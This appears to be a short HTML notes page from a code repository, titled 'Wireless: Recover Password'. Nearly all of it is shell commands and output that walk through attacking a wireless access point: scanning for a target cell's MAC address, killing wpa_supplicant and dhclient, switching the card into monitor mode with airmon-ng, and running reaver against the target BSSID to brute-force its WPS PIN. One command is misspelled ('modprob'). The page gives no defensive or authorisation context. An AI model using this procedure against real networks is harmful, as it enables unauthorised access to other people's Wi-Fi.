blob: 74810694a12db89606fd7731d9a1c03ba5f33431 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
|
<html dir="ltr" lang="en">
<head>
<meta charset='utf-8'>
<title>Wireless</title>
</head>
<body>
<h1>Wireless</h1>
<h4>Recover Password</h4>
<p>Tested on debian system only.</p>
<p>First get mac address of the target cell;</p>
<pre>
# iwlist wlp2s0 scan
</pre>
<p>Example output that matter;</p>
<pre>
Cell 03 - Address: A8:A6:68:98:0C:C5
</pre>
<pre>
# airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1271 wpa_supplicant
1576 wpa_supplicant
1633 dhclient
Process with PID 1576 (wpa_supplicant) is running on interface wlan0
Process with PID 1633 (dhclient) is running on interface wlan0
</pre>
<p>Pkill or kill all of them, ex 1271;</p>
<pre>
# kill -15 1271
</pre>
<p>If that fails;</p>
<pre>
# kill -9 1271
</pre>
<p>Just to be sure that everything is as it should;</p>
<pre>
# rmmod iwlmvm
# rmmod iwlwifi
# modprob iwlwifi
</pre>
<p>Put interface in monitor mode;</p>
<pre>
# iwconfig wlp2s0 mode monitor
# ifconfig wlp2s0 up
</pre>
<pre>
# airmon-ng start wlp2s0
Interface Chipset Driver
wlp2s0 Intel AC iwlwifi - [phy1]
(monitor mode enabled on mon0)
</pre>
<p>Put mon0 on same channel of target cell;</p>
<pre>
# iwconfig mon0 channel 6
</pre>
<p>Start the magic;</p>
<pre>
# reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv
</pre>
</body>
</html>
|